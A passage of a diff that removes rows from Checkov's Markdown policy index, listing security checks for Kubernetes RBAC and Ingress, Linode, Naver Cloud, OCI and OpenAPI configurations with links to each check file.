-| 3468 | CKV_K8S_151 | resource | StatefulSet | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) |
-| 3469 | CKV_K8S_152 | resource | Ingress | Prevent NGINX Ingress annotation snippets 
which contain LUA code execution. See CVE-2021-25742 | Kubernetes | [NginxIngressCVE202125742Lua.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/NginxIngressCVE202125742Lua.py) |
-| 3470 | CKV_K8S_153 | resource | Ingress | Prevent All NGINX Ingress annotation snippets. See CVE-2021-25742 | Kubernetes | [NginxIngressCVE202125742AllSnippets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/NginxIngressCVE202125742AllSnippets.py) |
-| 3471 | CKV_K8S_154 | resource | Ingress | Prevent NGINX Ingress annotation snippets which contain alias statements See CVE-2021-25742 | Kubernetes | [NginxIngressCVE202125742Alias.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/NginxIngressCVE202125742Alias.py) |
-| 3472 | CKV_K8S_155 | resource | ClusterRole | Minimize ClusterRoles that grant control over validating or mutating admission webhook configurations | Kubernetes | [RbacControlWebhooks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacControlWebhooks.py) |
-| 3473 | CKV_K8S_156 | resource | ClusterRole | Minimize ClusterRoles that grant permissions to approve CertificateSigningRequests | Kubernetes | [RbacApproveCertificateSigningRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacApproveCertificateSigningRequests.py) |
-| 3474 | CKV_K8S_157 | resource | ClusterRole | Minimize Roles and ClusterRoles that grant permissions to bind RoleBindings or ClusterRoleBindings | Kubernetes | [RbacBindRoleBindings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacBindRoleBindings.py) |
-| 3475 | CKV_K8S_157 | resource | Role | Minimize Roles and ClusterRoles that grant permissions to bind RoleBindings or ClusterRoleBindings | Kubernetes | 
[RbacBindRoleBindings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacBindRoleBindings.py) |
-| 3476 | CKV_K8S_158 | resource | ClusterRole | Minimize Roles and ClusterRoles that grant permissions to escalate Roles or ClusterRoles | Kubernetes | [RbacEscalateRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacEscalateRoles.py) |
-| 3477 | CKV_K8S_158 | resource | Role | Minimize Roles and ClusterRoles that grant permissions to escalate Roles or ClusterRoles | Kubernetes | [RbacEscalateRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacEscalateRoles.py) |
-| 3478 | CKV2_K8S_1 | resource | ClusterRole | RoleBinding should not allow privilege escalation to a ServiceAccount or Node on other RoleBinding | Kubernetes | [RoleBindingPE.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RoleBindingPE.yaml) |
-| 3479 | CKV2_K8S_1 | resource | ClusterRoleBinding | RoleBinding should not allow privilege escalation to a ServiceAccount or Node on other RoleBinding | Kubernetes | [RoleBindingPE.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RoleBindingPE.yaml) |
-| 3480 | CKV2_K8S_1 | resource | Role | RoleBinding should not allow privilege escalation to a ServiceAccount or Node on other RoleBinding | Kubernetes | [RoleBindingPE.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RoleBindingPE.yaml) |
-| 3481 | CKV2_K8S_1 | resource | RoleBinding | RoleBinding should not allow privilege escalation to a ServiceAccount or Node on other RoleBinding | Kubernetes | [RoleBindingPE.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RoleBindingPE.yaml) |
-| 3482 | CKV2_K8S_2 | resource | ClusterRole | Granting `create` permissions to `nodes/proxy` or `pods/exec` 
sub resources allows potential privilege escalation | Kubernetes | [NoCreateNodesProxyOrPodsExec.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/NoCreateNodesProxyOrPodsExec.yaml) |
-| 3483 | CKV2_K8S_2 | resource | ClusterRoleBinding | Granting `create` permissions to `nodes/proxy` or `pods/exec` sub resources allows potential privilege escalation | Kubernetes | [NoCreateNodesProxyOrPodsExec.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/NoCreateNodesProxyOrPodsExec.yaml) |
-| 3484 | CKV2_K8S_2 | resource | Role | Granting `create` permissions to `nodes/proxy` or `pods/exec` sub resources allows potential privilege escalation | Kubernetes | [NoCreateNodesProxyOrPodsExec.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/NoCreateNodesProxyOrPodsExec.yaml) |
-| 3485 | CKV2_K8S_2 | resource | RoleBinding | Granting `create` permissions to `nodes/proxy` or `pods/exec` sub resources allows potential privilege escalation | Kubernetes | [NoCreateNodesProxyOrPodsExec.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/NoCreateNodesProxyOrPodsExec.yaml) |
-| 3486 | CKV2_K8S_3 | resource | ClusterRole | No ServiceAccount/Node should have `impersonate` permissions for groups/users/service-accounts | Kubernetes | [ImpersonatePermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ImpersonatePermissions.yaml) |
-| 3487 | CKV2_K8S_3 | resource | ClusterRoleBinding | No ServiceAccount/Node should have `impersonate` permissions for groups/users/service-accounts | Kubernetes | [ImpersonatePermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ImpersonatePermissions.yaml) |
-| 3488 | CKV2_K8S_3 | resource | Role | No ServiceAccount/Node should have `impersonate` permissions for 
groups/users/service-accounts | Kubernetes | [ImpersonatePermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ImpersonatePermissions.yaml) |
-| 3489 | CKV2_K8S_3 | resource | RoleBinding | No ServiceAccount/Node should have `impersonate` permissions for groups/users/service-accounts | Kubernetes | [ImpersonatePermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ImpersonatePermissions.yaml) |
-| 3490 | CKV2_K8S_4 | resource | ClusterRole | ServiceAccounts and nodes that can modify services/status may set the `status.loadBalancer.ingress.ip` field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster. | Kubernetes | [ModifyServicesStatus.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ModifyServicesStatus.yaml) |
-| 3491 | CKV2_K8S_4 | resource | ClusterRoleBinding | ServiceAccounts and nodes that can modify services/status may set the `status.loadBalancer.ingress.ip` field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster. | Kubernetes | [ModifyServicesStatus.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ModifyServicesStatus.yaml) |
-| 3492 | CKV2_K8S_4 | resource | Role | ServiceAccounts and nodes that can modify services/status may set the `status.loadBalancer.ingress.ip` field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster. | Kubernetes | [ModifyServicesStatus.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ModifyServicesStatus.yaml) |
-| 3493 | CKV2_K8S_4 | resource | RoleBinding | ServiceAccounts and nodes that can modify services/status may set the `status.loadBalancer.ingress.ip` field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster. 
| Kubernetes | [ModifyServicesStatus.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ModifyServicesStatus.yaml) |
-| 3494 | CKV2_K8S_5 | resource | ClusterRole | No ServiceAccount/Node should be able to read all secrets | Kubernetes | [ReadAllSecrets.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ReadAllSecrets.yaml) |
-| 3495 | CKV2_K8S_5 | resource | ClusterRoleBinding | No ServiceAccount/Node should be able to read all secrets | Kubernetes | [ReadAllSecrets.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ReadAllSecrets.yaml) |
-| 3496 | CKV2_K8S_5 | resource | Role | No ServiceAccount/Node should be able to read all secrets | Kubernetes | [ReadAllSecrets.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ReadAllSecrets.yaml) |
-| 3497 | CKV2_K8S_5 | resource | RoleBinding | No ServiceAccount/Node should be able to read all secrets | Kubernetes | [ReadAllSecrets.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ReadAllSecrets.yaml) |
-| 3498 | CKV2_K8S_6 | resource | Deployment | Minimize the admission of pods which lack an associated NetworkPolicy | Kubernetes | [RequireAllPodsToHaveNetworkPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RequireAllPodsToHaveNetworkPolicy.yaml) |
-| 3499 | CKV2_K8S_6 | resource | Pod | Minimize the admission of pods which lack an associated NetworkPolicy | Kubernetes | [RequireAllPodsToHaveNetworkPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RequireAllPodsToHaveNetworkPolicy.yaml) |
-| 3500 | CKV_LIN_1 | provider | linode | Ensure no hard coded Linode tokens exist in provider | Terraform | 
[credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/linode/credentials.py) |
-| 3501 | CKV_LIN_2 | resource | linode_instance | Ensure SSH key set in authorized_keys | Terraform | [authorized_keys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/authorized_keys.py) |
-| 3502 | CKV_LIN_3 | resource | linode_user | Ensure email is set | Terraform | [user_email_set.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/user_email_set.py) |
-| 3503 | CKV_LIN_4 | resource | linode_user | Ensure username is set | Terraform | [user_username_set.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/user_username_set.py) |
-| 3504 | CKV_LIN_5 | resource | linode_firewall | Ensure Inbound Firewall Policy is not set to ACCEPT | Terraform | [firewall_inbound_policy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/firewall_inbound_policy.py) |
-| 3505 | CKV_LIN_6 | resource | linode_firewall | Ensure Outbound Firewall Policy is not set to ACCEPT | Terraform | [firewall_outbound_policy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/firewall_outbound_policy.py) |
-| 3506 | CKV_NCP_1 | resource | ncloud_lb_target_group | Ensure HTTP HTTPS Target group defines Healthcheck | Terraform | [LBTargetGroupDefinesHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBTargetGroupDefinesHealthCheck.py) |
-| 3507 | CKV_NCP_2 | resource | ncloud_access_control_group | Ensure every access control groups rule has a description | Terraform | [AccessControlGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupRuleDescription.py) |
-| 3508 | CKV_NCP_2 | resource | ncloud_access_control_group_rule | Ensure 
every access control groups rule has a description | Terraform | [AccessControlGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupRuleDescription.py) |
-| 3509 | CKV_NCP_3 | resource | ncloud_access_control_group_rule | Ensure no security group rules allow outbound traffic to 0.0.0.0/0 | Terraform | [AccessControlGroupOutboundRule.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupOutboundRule.py) |
-| 3510 | CKV_NCP_4 | resource | ncloud_access_control_group_rule | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 22 | Terraform | [AccessControlGroupInboundRulePort22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort22.py) |
-| 3511 | CKV_NCP_5 | resource | ncloud_access_control_group_rule | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 3389 | Terraform | [AccessControlGroupInboundRulePort3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort3389.py) |
-| 3512 | CKV_NCP_6 | resource | ncloud_server | Ensure Server instance is encrypted. | Terraform | [ServerEncryptionVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/ServerEncryptionVPC.py) |
-| 3513 | CKV_NCP_7 | resource | ncloud_launch_configuration | Ensure Basic Block storage is encrypted. 
| Terraform | [LaunchConfigurationEncryptionVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LaunchConfigurationEncryptionVPC.py) |
-| 3514 | CKV_NCP_8 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 20 | Terraform | [NACLInbound20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound20.py) |
-| 3515 | CKV_NCP_9 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 21 | Terraform | [NACLInbound21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound21.py) |
-| 3516 | CKV_NCP_10 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 22 | Terraform | [NACLInbound22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound22.py) |
-| 3517 | CKV_NCP_11 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 3389 | Terraform | [NACLInbound3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound3389.py) |
-| 3518 | CKV_NCP_12 | resource | ncloud_network_acl_rule | An inbound Network ACL rule should not allow ALL ports. 
| Terraform | [NACLPortCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLPortCheck.py) |
-| 3519 | CKV_NCP_13 | resource | ncloud_lb_listener | Ensure LB Listener uses only secure protocols | Terraform | [LBListenerUsesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBListenerUsesSecureProtocols.py) |
-| 3520 | CKV_NCP_14 | resource | ncloud_nas_volume | Ensure NAS is securely encrypted | Terraform | [NASEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NASEncryptionEnabled.py) |
-| 3521 | CKV_NCP_15 | resource | ncloud_lb_target_group | Ensure Load Balancer Target Group is not using HTTP | Terraform | [LBTargetGroupUsingHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBTargetGroupUsingHTTPS.py) |
-| 3522 | CKV_NCP_16 | resource | ncloud_lb | Ensure Load Balancer isn't exposed to the internet | Terraform | [LBNetworkPrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBNetworkPrivate.py) |
-| 3523 | CKV_NCP_18 | resource | ncloud_auto_scaling_group | Ensure that auto Scaling groups that are associated with a load balancer, are using Load Balancing health checks. | Terraform | [AutoScalingEnabledLB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AutoScalingEnabledLB.yaml) |
-| 3524 | CKV_NCP_18 | resource | ncloud_lb_target_group | Ensure that auto Scaling groups that are associated with a load balancer, are using Load Balancing health checks. 
| Terraform | [AutoScalingEnabledLB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AutoScalingEnabledLB.yaml) |
-| 3525 | CKV_NCP_19 | resource | ncloud_nks_cluster | Ensure Naver Kubernetes Service public endpoint disabled | Terraform | [NKSPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NKSPublicAccess.py) |
-| 3526 | CKV_NCP_20 | resource | ncloud_route | Ensure Routing Table associated with Web tier subnet have the default route (0.0.0.0/0) defined to allow connectivity | Terraform | [RouteTableNATGatewayDefault.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/RouteTableNATGatewayDefault.py) |
-| 3527 | CKV_NCP_22 | resource | ncloud_nks_cluster | Ensure NKS control plane logging enabled for all log types | Terraform | [NKSControlPlaneLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NKSControlPlaneLogging.py) |
-| 3528 | CKV_NCP_22 | resource | ncloud_route_table | Ensure a route table for the public subnets is created. | Terraform | [RouteTablePublicSubnetConnection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/RouteTablePublicSubnetConnection.yaml) |
-| 3529 | CKV_NCP_22 | resource | ncloud_subnet | Ensure a route table for the public subnets is created. | Terraform | [RouteTablePublicSubnetConnection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/RouteTablePublicSubnetConnection.yaml) |
-| 3530 | CKV_NCP_23 | resource | ncloud_public_ip | Ensure Server instance should not have public IP. 
| Terraform | [ServerPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/ServerPublicIP.py) |
-| 3531 | CKV_NCP_24 | resource | ncloud_lb_listener | Ensure Load Balancer Listener Using HTTPS | Terraform | [LBListenerUsingHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBListenerUsingHTTPS.py) |
-| 3532 | CKV_NCP_25 | resource | ncloud_access_control_group_rule | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 80 | Terraform | [AccessControlGroupInboundRulePort80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort80.py) |
-| 3533 | CKV_NCP_26 | resource | ncloud_access_control_group | Ensure Access Control Group has Access Control Group Rule attached | Terraform | [AccessControlGroupRuleDefine.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AccessControlGroupRuleDefine.yaml) |
-| 3534 | CKV_OCI_1 | provider | oci | Ensure no hard coded OCI private key in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/oci/credentials.py) |
-| 3535 | CKV_OCI_2 | resource | oci_core_volume | Ensure OCI Block Storage Block Volume has backup enabled | Terraform | [StorageBlockBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/StorageBlockBackupEnabled.py) |
-| 3536 | CKV_OCI_3 | resource | oci_core_volume | OCI Block Storage Block Volumes are not encrypted with a Customer Managed Key (CMK) | Terraform | [StorageBlockEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/StorageBlockEncryption.py) |
-| 3537 | CKV_OCI_4 | resource | oci_core_instance | Ensure OCI Compute Instance boot volume has in-transit data encryption enabled | Terraform | 
[InstanceBootVolumeIntransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceBootVolumeIntransitEncryption.py) |
-| 3538 | CKV_OCI_5 | resource | oci_core_instance | Ensure OCI Compute Instance has Legacy MetaData service endpoint disabled | Terraform | [InstanceMetadataServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceMetadataServiceEnabled.py) |
-| 3539 | CKV_OCI_6 | resource | oci_core_instance | Ensure OCI Compute Instance has monitoring enabled | Terraform | [InstanceMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceMonitoringEnabled.py) |
-| 3540 | CKV_OCI_7 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage bucket can emit object events | Terraform | [ObjectStorageEmitEvents.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageEmitEvents.py) |
-| 3541 | CKV_OCI_8 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage has versioning enabled | Terraform | [ObjectStorageVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageVersioning.py) |
-| 3542 | CKV_OCI_9 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage is encrypted with Customer Managed Key | Terraform | [ObjectStorageEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageEncryption.py) |
-| 3543 | CKV_OCI_10 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage is not Public | Terraform | [ObjectStoragePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStoragePublic.py) |
-| 3544 | CKV_OCI_11 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain lower case | Terraform | 
[IAMPasswordPolicyLowerCase.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyLowerCase.py) |
-| 3545 | CKV_OCI_12 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain Numeric characters | Terraform | [IAMPasswordPolicyNumeric.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyNumeric.py) |
-| 3546 | CKV_OCI_13 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain Special characters | Terraform | [IAMPasswordPolicySpecialCharacters.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicySpecialCharacters.py) |
-| 3547 | CKV_OCI_14 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain Uppercase characters | Terraform | [IAMPasswordPolicyUpperCase.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyUpperCase.py) |
-| 3548 | CKV_OCI_15 | resource | oci_file_storage_file_system | Ensure OCI File System is Encrypted with a customer Managed Key | Terraform | [FileSystemEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/FileSystemEncryption.py) |
-| 3549 | CKV_OCI_16 | resource | oci_core_security_list | Ensure VCN has an inbound security list | Terraform | [SecurityListIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListIngress.py) |
-| 3550 | CKV_OCI_17 | resource | oci_core_security_list | Ensure VCN inbound security lists are stateless | Terraform | [SecurityListIngressStateless.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListIngressStateless.py) |
-| 3551 | CKV_OCI_18 | resource | oci_identity_authentication_policy | OCI IAM password policy for local (non-federated) users has 
a minimum length of 14 characters | Terraform | [IAMPasswordLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordLength.py) |
-| 3552 | CKV_OCI_19 | resource | oci_core_security_list | Ensure no security list allow ingress from 0.0.0.0:0 to port 22. | Terraform | [SecurityListUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress22.py) |
-| 3553 | CKV_OCI_20 | resource | oci_core_security_list | Ensure no security list allow ingress from 0.0.0.0:0 to port 3389. | Terraform | [SecurityListUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress3389.py) |
-| 3554 | CKV_OCI_21 | resource | oci_core_network_security_group_security_rule | Ensure security group has stateless ingress security rules | Terraform | [SecurityGroupsIngressStatelessSecurityRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityGroupsIngressStatelessSecurityRules.py) |
-| 3555 | CKV_OCI_22 | resource | oci_core_network_security_group_security_rule | Ensure no security groups rules allow ingress from 0.0.0.0/0 to port 22 | Terraform | [AbsSecurityGroupUnrestrictedIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/AbsSecurityGroupUnrestrictedIngress.py) |
-| 3556 | CKV2_OCI_1 | resource | oci_identity_group | Ensure administrator users are not associated with API keys | Terraform | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml) |
-| 3557 | CKV2_OCI_1 | resource | oci_identity_user | Ensure administrator users are not associated with API keys | Terraform | 
[AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml) |
-| 3558 | CKV2_OCI_1 | resource | oci_identity_user_group_membership | Ensure administrator users are not associated with API keys | Terraform | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml) |
-| 3559 | CKV2_OCI_2 | resource | oci_core_network_security_group_security_rule | Ensure NSG does not allow all traffic on RDP port (3389) | Terraform | [OCI_NSGNotAllowRDP.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_NSGNotAllowRDP.yaml) |
-| 3560 | CKV2_OCI_3 | resource | oci_containerengine_cluster | Ensure Kubernetes engine cluster is configured with NSG(s) | Terraform | [OCI_KubernetesEngineClusterEndpointConfigWithNSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_KubernetesEngineClusterEndpointConfigWithNSG.yaml) |
-| 3561 | CKV2_OCI_4 | resource | oci_file_storage_export | Ensure File Storage File System access is restricted to root users | Terraform | [OCI_NFSaccessRestrictedToRootUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_NFSaccessRestrictedToRootUsers.yaml) |
-| 3562 | CKV2_OCI_5 | resource | oci_containerengine_node_pool | Ensure Kubernetes Engine Cluster boot volume is configured with in-transit data encryption | Terraform | [OCI_K8EngineClusterBootVolConfigInTransitEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_K8EngineClusterBootVolConfigInTransitEncryption.yaml) |
-| 3563 | CKV2_OCI_6 | resource | oci_containerengine_cluster | Ensure Kubernetes Engine Cluster pod security policy is enforced | 
Terraform | [OCI_K8EngineClusterPodSecPolicyEnforced.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_K8EngineClusterPodSecPolicyEnforced.yaml) |
-| 3564 | CKV_OPENAPI_1 | resource | securityDefinitions | Ensure that securityDefinitions is defined and not empty - version 2.0 files | OpenAPI | [SecurityDefinitions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/SecurityDefinitions.py) |
-| 3565 | CKV_OPENAPI_2 | resource | security | Ensure that if the security scheme is not of type 'oauth2', the array value must be empty - version 2.0 files | OpenAPI | [Oauth2SecurityRequirement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2SecurityRequirement.py) |
-| 3566 | CKV_OPENAPI_3 | resource | components | Ensure that security schemes don't allow cleartext credentials over unencrypted channel - version 3.x.y files | OpenAPI | [CleartextOverUnencryptedChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v3/CleartextOverUnencryptedChannel.py) |
-| 3567 | CKV_OPENAPI_4 | resource | security | Ensure that the global security field has rules defined | OpenAPI | [GlobalSecurityFieldIsEmpty.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/generic/GlobalSecurityFieldIsEmpty.py) |
-| 3568 | CKV_OPENAPI_5 | resource | security | Ensure that security operations is not empty. 
| OpenAPI | [SecurityOperations.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/generic/SecurityOperations.py) | -| 3569 | CKV_OPENAPI_6 | resource | security | Ensure that security requirement defined in securityDefinitions - version 2.0 files | OpenAPI | [SecurityRequirement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/SecurityRequirement.py) | -| 3570 | CKV_OPENAPI_7 | resource | security | Ensure that the path scheme does not support unencrypted HTTP connection where all transmissions are open to interception- version 2.0 files | OpenAPI | [PathSchemeDefineHTTP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/PathSchemeDefineHTTP.py) | -| 3571 | CKV_OPENAPI_8 | resource | security | Ensure that security is not using 'password' flow in OAuth2 authentication - version 2.0 files | OpenAPI | [Oauth2SecurityPasswordFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2SecurityPasswordFlow.py) | -| 3572 | CKV_OPENAPI_9 | resource | paths | Ensure that security scopes of operations are defined in securityDefinitions - version 2.0 files | OpenAPI | [OperationObjectSecurityScopeUndefined.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectSecurityScopeUndefined.py) | -| 